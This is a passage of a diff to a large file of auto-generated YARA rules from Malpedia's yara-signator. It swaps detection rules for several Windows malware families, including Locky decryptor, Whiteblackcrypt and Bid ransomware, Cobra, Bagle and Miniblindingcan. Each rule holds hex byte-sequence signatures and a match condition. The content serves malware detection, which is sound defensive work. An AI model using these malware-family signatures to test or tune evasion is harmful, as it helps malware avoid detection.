-		$sequence_18 = { f2e8fae6d5f6 d2b5f2bb8ff3 ae 73f3 aa }
-		$sequence_19 = { 7cc8 dc7acd e291 d2e8 }
-		$sequence_20 = { 78ff 0d50004900 3e3cff 46 14ff 0470 fe0a }
-		$sequence_21 = { ff06 0200 0100 8a00 }
-		$sequence_22 = { ec f3ed ebf2 ed ec }
-		$sequence_23 = { 00cf c0b200d1c3b600 e6d3 a1???????? 00ec }
+		$sequence_0 = { 8d8c24fc150000 3b11 7514 8b442414 }
+		$sequence_1 = { 8d8e19080000 50 51 c706???????? 899e04080000 }
+		$sequence_2 = { c645fc0a e9???????? 8d4db8 e8???????? 3bc3 8945dc 0f8601020000 }
+		$sequence_3 = { 6a20 68???????? e8???????? 8b15???????? }
+		$sequence_4 = { 83c10e 894d18 eb1f 8b4514 83f810 7507 b80a000000 }
+		$sequence_5 = { e8???????? 8b4c2410 51 8b8b08080000 e8???????? 8d4c2410 c684240452000001 }
+		$sequence_6 = { 85c0 0f85fb050000 668b15???????? b9ff000000 8dbc24fe350000 66899424fc350000 f3ab }
+		$sequence_7 = { 8bf0 8bce e8???????? 8b542410 8bce 52 }
+		$sequence_8 = { 8bca 8d959cfdffff 83e103 f3a4 bf???????? 83c9ff f2ae }
+		$sequence_9 = { aa b9ff000000 33c0 8dbd5df5ffff 889d5cf5ffff f3ab }
 
 	condition:
-		7 of them and filesize < 409600
+		7 of them and filesize < 761856
 }
-rule MALPEDIA_Win_Unidentified_080_Auto : FILE
+rule MALPEDIA_Win_Cobra_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2fada674-370f-5bc5-84a9-2e5ff9925df1"
+		id = "b7889e85-8a86-5887-854a-7a6437d9a16b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_080"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_080_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobra"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cobra_auto.yar#L1-L476"
 		license_url = "N/A"
-		logic_hash = "f4698b30ea4cfaea5b3dd4c3d2fb3772007307dc7944cfe2e7ccc981a278d898"
+		logic_hash = "652efe51bbd71c6c383988a4a5e7893f0deae6bcb5db842e07957bb56af5eae8"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -113893,32 +114035,78 @@ rule MALPEDIA_Win_Unidentified_080_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c7859cfdffff34290210 c685a4fdffff0f 89bda8fdffff 89bdacfdffff 89bdb0fdffff 89bdb4fdffff 89bdb8fdffff }
-		$sequence_1 = { 8b4df8 8b55f0 53 51 52 e8???????? }
-		$sequence_2 = { 6a04 57 56 c645fc08 ff15???????? 85c0 7504 }
-		$sequence_3 = { 8b742414 83c6f4 81fe???????? 7414 56 ff15???????? }
-		$sequence_4 = { 8b4e14 894f14 8b5618 895718 8b461c 8378f400 8d4f1c }
-		$sequence_5 = { 8b4604 57 33ff 3bc7 7439 8b4e0c }
-		$sequence_6 = { 0f95c1 8d5a01 53 85c9 740b 50 e8???????? }
-		$sequence_7 = { 83ec14 8d45d0 8bf4 8965e4 50 }
-		$sequence_8 = { 6804900000 c707???????? e8???????? 6804500000 894704 e8???????? 894708 }
-		$sequence_9 = { 85c0 7456 8dbda4fdffff e8???????? 8bc7 50 b8???????? }
+		$sequence_0 = { 7511 e8???????? 85c0 7508 ff15???????? }
+		$sequence_1 = { ff25???????? 53 56 57 8bd9 33f6 }
+		$sequence_2 = { 85c0 750e 3905???????? 7e2c ff0d???????? 83f801 8b0d???????? }
+		$sequence_3 = { c3 85db 7405 83fb03 }
+		$sequence_4 = { 85c0 750e 33ff 8bc7 }
+		$sequence_5 = { 7514 391d???????? 754d 33c0 }
+		$sequence_6 = { 5b c3 83fb01 7405 83fb02 7537 }
+		$sequence_7 = { 890d???????? 753c b980000000 e8???????? 85c0 }
+		$sequence_8 = { 85c0 a3???????? 7504 33c0 eb68 }
+		$sequence_9 = { 83f801 75f1 b900010000 e8???????? }
+		$sequence_10 = { 5f 5e 5b c3 85ff 7418 }
+		$sequence_11 = { 85c0 0f8e8c000000 83e801 8905???????? }
+		$sequence_12 = { e8???????? 8bf8 83fb01 751d 85ff }
+		$sequence_13 = { 33d2 b9e8030000 f7f1 83f805 }
+		$sequence_14 = { 7407 33c0 e9???????? ff15???????? e9???????? }
+		$sequence_15 = { e8???????? 834df8ff 53 57 33db 6800200000 }
+		$sequence_16 = { ff15???????? 8b3d???????? 55 bbffffff7f }
+		$sequence_17 = { 7f07 e8???????? eb26 83c0ff }
+		$sequence_18 = { eb6d e8???????? 85c0 7564 }
+		$sequence_19 = { e8???????? 33db 3bc3 741a }
+		$sequence_20 = { ff5024 488d4d08 e8???????? 488d4d08 e8???????? }
+		$sequence_21 = { 8bc7 eb0e 4883c108 e8???????? }
+		$sequence_22 = { c3 8bc5 ebe4 4533f6 413bee 75f4 }
+		$sequence_23 = { 83385c 7e4b 4c8b505c 4d85d2 7442 448b6c2470 4c8bce }
+		$sequence_24 = { e8???????? b801005921 488b5c2430 488b742438 4883c420 }
+		$sequence_25 = { 83781400 750a b865005921 e9???????? }
+		$sequence_26 = { 83c0fe 668b4802 83c002 663bcb 75f4 8b15???????? 8b0d???????? }
+		$sequence_27 = { c3 8b4d08 57 51 6a00 }
+		$sequence_28 = { 6689440ffc 6685c0 75ee f685c003000010 }
+		$sequence_29 = { 8908 8b0d???????? 895004 894808 33c0 }
+		$sequence_30 = { 8b7d0c 3bc3 7508 3bfb }
+		$sequence_31 = { 83feff 7505 33c0 5e 5d c3 8b4d08 }
+		$sequence_32 = { ff15???????? 83f87a 740b 3d230000c0 }
+		$sequence_33 = { 8bec 56 6a00 6880000000 6a03 6a00 6a03 }
+		$sequence_34 = { 68???????? 51 ffd6 83c40c 6a28 }
+		$sequence_35 = { 6a03 68000000c0 50 ff15???????? 8bf0 83feff 7505 }
+		$sequence_36 = { 8d45e8 50 6a00 6aff e8???????? 85c0 7405 }
+		$sequence_37 = { 4156 4157 488dac24b8f3ffff 4881ec480d0000 4533e4 4c8bf1 488bda }
+		$sequence_38 = { ff15???????? 488bcf ff15???????? 41b701 }
+		$sequence_39 = { 8d8588feffff 68???????? 50 ff15???????? 83c42c }
+		$sequence_40 = { 4584ff 7518 33c0 4881c4480d0000 }
+		$sequence_41 = { 48894c2450 4c89642448 488d4c2468 48894c2440 }
+		$sequence_42 = { 48894706 488b05???????? 4889470e 0fb705???????? }
+		$sequence_43 = { 84c0 0f45f9 488bce 8bd7 ff15???????? }
+		$sequence_44 = { 7507 32c0 e9???????? c745b818000000 }
+		$sequence_45 = { 83c002 6685c9 75f5 2bc2 d1f8 66837c43fe5c }
+		$sequence_46 = { 05a2000000 50 8d8c249c0d0000 68???????? }
+		$sequence_47 = { 0f8431ffffff 8b4d08 5f 8931 }
+		$sequence_48 = { 0f8456feffff 807c241301 6800080000 0f8544020000 }
+		$sequence_49 = { 0f84100f0000 6800080000 57 56 }
+		$sequence_50 = { 05a2000000 50 8d94249c0d0000 68???????? }
+		$sequence_51 = { 05a1000000 50 8d84249c0d0000 68???????? }
+		$sequence_52 = { 668cc8 c3 53 50 }
+		$sequence_53 = { 85c0 740a b8050000c0 e9???????? }
+		$sequence_54 = { c745c000000000 8d45cc 50 8b4dc8 51 ff15???????? }
+		$sequence_55 = { c745c000000000 8d4dcc 51 8b55c8 }
 
 	condition:
-		7 of them and filesize < 392192
+		7 of them and filesize < 1368064
 }
-rule MALPEDIA_Win_Whiteblackcrypt_Auto : FILE
+rule MALPEDIA_Win_Playwork_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "39243d42-8305-573c-a47b-e4b6dd139aef"
+		id = "04893cf6-e630-529b-badc-29b196733e23"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.whiteblackcrypt"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.whiteblackcrypt_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.playwork"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.playwork_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "660907780e4078f0416bec5591629e01f78308bd70eb5a7d32026bca72fd8322"
+		logic_hash = "7105c3ff4bb7347e4c96600c56543cdd3a8eee25d86105d64120af9ee3e9d2c3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -113932,32 +114120,32 @@ rule MALPEDIA_Win_Whiteblackcrypt_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 790d b910270000 ff15???????? ebea e8???????? b805000030 31c9 }
-		$sequence_1 = { 4989e8 e8???????? 80be4402000000 4989c1 }
-		$sequence_2 = { 418a530b 4188530f 418a5307 41884307 4188530b 0f8490000000 }
-		$sequence_3 = { 45887801 e8???????? 4131c6 4531ca 4531ee 410fb6ca }
-		$sequence_4 = { e8???????? 4889c7 4989d9 41b800000002 }
-		$sequence_5 = { c744242c413a5c00 89c5 f20f2acb 488b05???????? }
-		$sequence_6 = { 83e820 8801 48ffc1 ebe8 c3 }
-		$sequence_7 = { 4188530f 418a5307 41884307 4188530b 0f8490000000 }
-		$sequence_8 = { 488d1da9890000 488d35a2890000 4839de 74df 488b03 4885c0 }
-		$sequence_9 = { 410f94c2 4409d0 4109cb 753a 84c0 }
+		$sequence_0 = { 56 50 897510 ff7308 }
+		$sequence_1 = { 8975e0 8b75f0 8b0c8d344f3f00 c1ee18 330cb534573f00 330c9534533f00 8b55f4 }
+		$sequence_2 = { eb02 33c0 c1e008 0bc6 8a9f5c8e3f00 c1e008 0bc6 }
+		$sequence_3 = { ffd6 80a56cfeffff00 6a1f 59 33c0 8dbd6dfeffff 6880000000 }
+		$sequence_4 = { 85c0 7520 ff75fc 8b35???????? ffd6 ff7508 ffd6 }
+		$sequence_5 = { c1ca08 8bda 8bc2 c1eb10 c1e818 0fb6db }
+		$sequence_6 = { 33c0 c1e008 0bc5 c1e008 0b442410 }
+		$sequence_7 = { ff75f4 ff15???????? ff75f0 eb01 57 ff15???????? }
+		$sequence_8 = { 53 53 68???????? ff75fc ffd6 85c0 5f }
+		$sequence_9 = { 81c41c640000 c3 55 8bec 81ecb8030000 53 56 }
 
 	condition:
-		7 of them and filesize < 99328
+		7 of them and filesize < 360448
 }
-rule MALPEDIA_Win_Mqsttang_Auto : FILE
+rule MALPEDIA_Win_Atmii_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5c891dae-4eed-590b-b193-46c6fc31d649"
+		id = "07359bf0-199f-5425-bfa3-1b99e24213c7"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mqsttang"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mqsttang_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmii"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.atmii_auto.yar#L1-L162"
 		license_url = "N/A"
-		logic_hash = "730db72c4ecde718fd98b702027c89d493008b2e112f78653e06311a808dd020"
+		logic_hash = "0000b9c68134784a20204e48d35d09ba08981bd4ad498b87f530c8bc9d180475"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -113971,32 +114159,38 @@ rule MALPEDIA_Win_Mqsttang_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ffd0 ebd0 c744241c02000000 c744242000000000 c744242400000000 c744242800000000 c744242cb47e7b00 }
-		$sequence_1 = { e8???????? 8b4da8 e8???????? 8b4dac e8???????? 891c24 e8???????? }
-		$sequence_2 = { e8???????? 8b85d0bfffff 8b00 3b5804 7ed8 8b85f0bfffff 3b85c0bfffff }
-		$sequence_3 = { f20f106dd0 f20f1055d8 f20f115d90 f20f116588 f20f116d80 f20f119578ffffff b808000000 }
-		$sequence_4 = { e8???????? 8b4340 8b4004 85c0 7507 8b4354 85c0 }
-		$sequence_5 = { e8???????? 85c0 0f844cffffff c705????????20339000 c705????????ffffffff c70424???????? e8???????? }
-		$sequence_6 = { e9???????? 8b06 ba20000000 8b9ecc000000 8945c0 8b45c4 668b4002 }
-		$sequence_7 = { f7e7 8d04b6 01c1 c1ea02 01ca 8b0493 5b }
-		$sequence_8 = { eb96 89c6 8d5db4 eb97 89c6 8d5db4 eb98 }
-		$sequence_9 = { e8???????? 891c24 89c1 a3???????? e8???????? 83ec04 83c418 }
+		$sequence_0 = { f6c302 740a 83481804 8a0a 884810 }
+		$sequence_1 = { 83c414 68???????? 50 68???????? 68???????? ffd7 8b4e10 }
+		$sequence_2 = { eb3e 84db 743a 8d4eb0 81f9a7000000 772f 0fb68920160010 }
+		$sequence_3 = { ffd6 83f803 0f85d8000000 8d85fcfdffff 50 }
+		$sequence_4 = { 8bec 81ec00040000 837d0803 0f8ceb000000 }
+		$sequence_5 = { 83c420 8d9df8fcffff e8???????? 8b7508 c645ff01 eb27 50 }
+		$sequence_6 = { 8d8ddcfbffff 68???????? 51 ff15???????? 8d95dcfbffff 52 }
+		$sequence_7 = { c645ece9 3bca 760c 2bca }
+		$sequence_8 = { 740d 81481804010000 8a0a 884810 }
+		$sequence_9 = { ffd3 68???????? 68???????? 8985c5f9ffff ffd7 }
+		$sequence_10 = { 68???????? 51 ffd6 8d95fcf3ffff }
+		$sequence_11 = { 6a00 56 ffd7 8bd8 85db }
+		$sequence_12 = { 8d8ddcfbffff 51 e8???????? 8b55fc }
+		$sequence_13 = { 83c444 6a00 6a00 6a03 }
+		$sequence_14 = { e8???????? 8b5608 8b3d???????? 83c414 }
+		$sequence_15 = { 68???????? 8d95f8feffff 52 ffd6 0fb74306 }
 
 	condition:
-		7 of them and filesize < 12651520
+		7 of them and filesize < 49152
 }
-rule MALPEDIA_Win_Tiop_Auto : FILE
+rule MALPEDIA_Win_Unidentified_104_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6a354c9f-7033-5930-8cdf-ccc9b036cb6a"
+		id = "d500f181-7347-5b56-b769-5ef7ee00cd2b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tiop"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.tiop_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_104"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_104_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "8dde382911bda80f4443cb56d55614794d75f26151cbf4838080e27ec3645e3d"
+		logic_hash = "4ebfb796f6d86b2c125f5dfb97b85200528b313a6e20e5b2b0501c20db7c82f7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -114010,32 +114204,32 @@ rule MALPEDIA_Win_Tiop_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 3be9 72e9 8b9e4c050000 83c9ff 8bfb 33c0 }
-		$sequence_1 = { 8b4608 50 ff15???????? 8b4e10 6a0d 51 }
-		$sequence_2 = { 5d 81c484000000 c20800 892e 5f 5e 33c0 }
-		$sequence_3 = { 8b15???????? 68f0000000 8d4c2460 89442464 6a04 8d44242a 51 }
-		$sequence_4 = { b90c000000 33c0 bf???????? f3ab 66ab 8bfa 83c9ff }
-		$sequence_5 = { 51 ff15???????? b908020000 33c0 8dbc2499090000 c684249809000000 }
-		$sequence_6 = { 56 ff15???????? 6a05 56 ff15???????? 68???????? 68e8030000 }
-		$sequence_7 = { 8b942448080000 55 51 8d442428 52 50 899c244c080000 }
-		$sequence_8 = { 8b10 6a00 8bc8 c744241000000000 ff12 8d4c2414 c744240cffffffff }
-		$sequence_9 = { 85c0 7502 5e c3 b9???????? e8???????? }
+		$sequence_0 = { 7607 ff15???????? cc e8???????? 0f117570 }
+		$sequence_1 = { 4c33df 498bcb 49c1eb18 48c1e128 4933cb 4c8b9c2490000000 }
+		$sequence_2 = { 0f1030 0f107810 4c896810 48c740180f000000 448828 488b9588000000 483bd3 }
+		$sequence_3 = { 0f2975a7 448b4d6f 4c8bc6 488d55e7 488d4d97 e8???????? 83f801 }
+		$sequence_4 = { 488d4d88 e8???????? 488d158f550100 488d4d88 e8???????? cc }
+		$sequence_5 = { 4183fd04 7d22 b804000000 488d4d48 412bc5 33d2 4c63c0 }
+		$sequence_6 = { 0f107507 0f2975a7 488d4d97 e8???????? 48b884afc053ee926aaf 488945e7 48b9a4ee4415aba19f06 }
+		$sequence_7 = { e8???????? 448b0b 4533c0 4585c9 0f84be000000 4c8d15b4b4ffff 488b4318 }
+		$sequence_8 = { 488d3c10 4d8bc4 488bcf 33d2 e8???????? 46883427 eb0e }
+		$sequence_9 = { 488d5304 448bc6 488bcf e8???????? 488d5308 448bc6 488bcf }
 
 	condition:
-		7 of them and filesize < 712704
+		7 of them and filesize < 263168
 }
-rule MALPEDIA_Win_Carrotball_Auto : FILE
+rule MALPEDIA_Win_Bagle_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8d1dffb9-f801-5b51-998b-8e4431af5d29"
+		id = "a1b117c6-ef70-5a17-abcf-06072ab81225"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.carrotball"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.carrotball_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bagle"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bagle_auto.yar#L1-L102"
 		license_url = "N/A"
-		logic_hash = "8cb2e3b01c31931d0c5f23b61551aa799de8dd787a3493373f0ac01ba6f109d9"
+		logic_hash = "78371b093ac9a1cbad80f2768798d5c43910e03f8eb339710028eb9343ade350"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -114049,34 +114243,32 @@ rule MALPEDIA_Win_Carrotball_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? eb36 68???????? 56 ff15???????? }
-		$sequence_1 = { 6a04 58 6bc000 c7807430001002000000 6a04 }
-		$sequence_2 = { 5f 8b4dfc 33cd 33c0 e8???????? 8be5 5d }
-		$sequence_3 = { ffd6 5e 5f 8b4dfc 33cd 33c0 }
-		$sequence_4 = { 68???????? ff15???????? eb36 68???????? 56 }
-		$sequence_5 = { 8bf0 85f6 0f84ac000000 68???????? }
-		$sequence_6 = { 56 ff15???????? 85c0 7432 8d85ecfdffff }
-		$sequence_7 = { ff15???????? 8bf8 85ff 0f84d9000000 56 }
-		$sequence_8 = { ff15???????? 8bf0 85f6 0f84ac000000 68???????? 56 ff15???????? }
-		$sequence_9 = { 6bc000 c7807430001002000000 6a04 58 6bc000 }
+		$sequence_0 = { 6a02 6a00 ff75fc e8???????? 0bc0 }
+		$sequence_1 = { 75e2 c3 55 8bec 56 8b4508 }
+		$sequence_2 = { 6a02 e8???????? 8bd8 ff7508 e8???????? 83fbff }
+		$sequence_3 = { 5e c9 c20c00 c1c206 8bc2 243f }
+		$sequence_4 = { 8b4d10 33db e340 ac }
+		$sequence_5 = { 6a00 6a00 6a00 ff7508 e8???????? 6a00 }
+		$sequence_6 = { 79c6 f7d9 2bf9 b03d }
+		$sequence_7 = { 6880000000 68???????? e8???????? 6a00 6a00 6a00 68???????? }
 
 	condition:
-		7 of them and filesize < 40960
+		7 of them and filesize < 245760
 }
-rule MALPEDIA_Win_Locky_Decryptor_Auto : FILE
+rule MALPEDIA_Win_Xpan_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "efee58a7-3550-5808-a11a-aa56167214d6"
+		id = "6b6d87b0-cd4f-5f1f-ad41-a91b081050bf"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.locky_decryptor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.locky_decryptor_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xpan"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.xpan_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "b6828e87e6bd376fe16778fc8bf9496b415a17dfa2572d88c3351b8ea18cb0b2"
+		logic_hash = "53afdb60ad3d527db39db546f8bfd19e69fe202e95aaa870b577cf5bc58b7794"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -114088,32 +114280,32 @@ rule MALPEDIA_Win_Locky_Decryptor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 834424181c 43 3bdf 7cd2 8b4510 3944243c }
-		$sequence_1 = { e8???????? ff15???????? 50 8d8578ffffff 50 8d45cc e8???????? }
-		$sequence_2 = { 57 ff750c 8d742414 e8???????? }
-		$sequence_3 = { e8???????? ff15???????? 50 8d442448 50 8d442414 }
-		$sequence_4 = { e8???????? 8bc6 5d c20400 c3 }
-		$sequence_5 = { 37 46 37 61 37 }
-		$sequence_6 = { 64a100000000 50 64892500000000 83ec78 8b4510 53 8b5d0c }
-		$sequence_7 = { 84c0 7403 ff45ec ff45e8 6a01 33ff 8d7594 }
-		$sequence_8 = { 59 6a01 33ff 8db578ffffff e8???????? }
-		$sequence_9 = { c745c007000000 668945ac e8???????? ff75e4 8365fc00 8d45c8 e8???????? }
+		$sequence_0 = { 83c002 894108 b8ffffffff 6689450c 8b4108 3b410c 0f83e6030000 }
+		$sequence_1 = { 740a 8b5c2444 c6450000 89ee 84d2 748c 8b6c2450 }
+		$sequence_2 = { 0f8313040000 0fb700 6683f8ff 0f8403030000 }
+		$sequence_3 = { c744247400000000 c744247cffffffff 89442454 8b8424a0000000 2500600000 89442420 89442458 }
+		$sequence_4 = { 0f848d020000 66894514 31c0 38d8 0f8427feffff 8b4d08 }
+		$sequence_5 = { 0fb65610 89fb 31c9 31ff 885dd0 8d7600 8dbc2700000000 }
+		$sequence_6 = { 8d5702 89c1 0f44fa 00c1 83df03 29ef 0f844dd3ffff }
+		$sequence_7 = { e9???????? 85c0 74e0 31f6 e9???????? 89eb }
+		$sequence_8 = { 83e101 742b b901000000 83c001 0fb610 80fa20 }
+		$sequence_9 = { 757d 85f6 0f84d8000000 f744245400180000 0f84ca000000 c6450000 84d2 }
 
 	condition:
-		7 of them and filesize < 278528
+		7 of them and filesize < 3235840
 }
-rule MALPEDIA_Win_Polpo_Auto : FILE
+rule MALPEDIA_Win_Miniblindingcan_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3ada2ef2-9c7f-50f6-a216-72665dfc2af3"
+		id = "7798fac4-4e5d-566f-a335-bf730671b981"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.polpo"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.polpo_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.miniblindingcan"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.miniblindingcan_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "72d335a1b2528c04f03bf454be2a2837ab466ed1973103cf7af4c8dafa43e467"
+		logic_hash = "58b505c72082d28e67c192bf52fda135efb347b75fec700d41c24b4ca9aa0285"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -114127,32 +114319,32 @@ rule MALPEDIA_Win_Polpo_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c745bc436f6e6e c745c065637469 c745c46f6e3a20 c745c84b656570 c745cc2d616c69 66c745d07665 884dd3 }
-		$sequence_1 = { 51 8d95dcf7ffff 52 e8???????? 8d85d4f7ffff 50 8d8ddcf7ffff }
-		$sequence_2 = { e8???????? 8be5 5d c20800 81fe00001000 0f878c000000 8b87a0040000 }
-		$sequence_3 = { 57 6800040000 8d95ecfbffff 68???????? 52 e8???????? 83c410 }
-		$sequence_4 = { 85d2 7534 8d45f8 50 e8???????? 8d4df8 51 }
-		$sequence_5 = { 8bc8 83e103 837d0c00 f3a4 741c 8b85a0fdffff 8d959cfdffff }
-		$sequence_6 = { 8995b0fbffff 8a10 40 84d2 75f9 2b85b0fbffff baff020000 }
-		$sequence_7 = { 83c1f0 51 8945dd 8945e1 8945e5 8945e9 8945ed }
-		$sequence_8 = { 83e03f 0fb680c0940120 83e23f 41 884602 8a92c0940120 885603 }
-		$sequence_9 = { 50 8d4ddc 51 8d954cffffff 52 8bce }
+		$sequence_0 = { 4c8bd1 b83f000000 0f05 c3 4c8bd1 b840000000 0f05 }
+		$sequence_1 = { 7715 488d0de0ce0000 410fb7c5 0fbe4c08e0 83e10f eb03 418bca }
+		$sequence_2 = { 8bd3 498bcc e8???????? 448b6c2438 488bf8 44896c2450 4c8d4608 }
+		$sequence_3 = { 4883c708 4883c108 482bcf 488b0439 488907 4883c708 493bf8 }
+		$sequence_4 = { 4889742438 488d45e0 4889742430 4c8d8736040000 448bcb 33d2 33c9 }
+		$sequence_5 = { 8bc2 4889742420 c1e81f 03d0 6603d2 66895509 488d55c7 }
+		$sequence_6 = { 488364246000 488364245800 c60100 488d4c2460 488d1500a20100 33db 215c2450 }
+		$sequence_7 = { ff15???????? e9???????? 488bcb ff15???????? 33c0 488b8c2400250000 4833cc }
+		$sequence_8 = { 483bd8 0f87e8020000 0f1003 4803de f30f7f07 440fb70b 498bc8 }
+		$sequence_9 = { 4c8bc6 48ffc6 418838 e9???????? 49ffc4 498b0c24 490fafc8 }
 
 	condition:
-		7 of them and filesize < 250880
+		7 of them and filesize < 453632
 }
-rule MALPEDIA_Win_Flashflood_Auto : FILE
+rule MALPEDIA_Win_Bid_Ransomware_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8a274825-f4c9-5f62-b907-dfc89a45069c"
+		id = "e2459c49-87ff-58be-b5d8-513cfe01796f"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.flashflood"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.flashflood_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bid_ransomware"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bid_ransomware_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "683f799d9771d2f1f092dca2666088c76c32113ac36ef3235bcc1b22e7e80191"
+		logic_hash = "932fef61c31980fb36a4d7c0896110af89987a449be43ee55891fe684dd7e3ac"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -114166,32 +114358,32 @@ rule MALPEDIA_Win_Flashflood_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 8b35???????? 8d85f0fdffff 6a2e 50 ffd6 }
-		$sequence_1 = { 50 ff5118 8b45f0 8b4dcc 8345e00c 3b08 }
-		$sequence_2 = { 83c428 6a00 6840420f00 ff75dc ff75d8 e8???????? }
-		$sequence_3 = { c3 33d2 39542408 7e24 53 8b442408 8d0c02 }
-		$sequence_4 = { c3 55 8bec 81ece8050000 8365fc00 6a00 e8???????? }
-		$sequence_5 = { 0fb745e4 50 8d8518fdffff 68???????? 50 ffd6 }
-		$sequence_6 = { 50 e8???????? 8d85f0fdffff 50 e8???????? 8bf0 83c40c }
-		$sequence_7 = { 7ce0 5f 5b c9 c3 8b542404 }
-		$sequence_8 = { e8???????? 8d85fcfdffff 50 e8???????? 8d85fcfdffff 53 }
-		$sequence_9 = { 50 8d8518ffffff 6880000000 50 53 ff15???????? }
+		$sequence_0 = { e8???????? 6a00 6a00 68???????? ff75a8 }
+		$sequence_1 = { 83e03f 8a80f6434000 aa 4e }
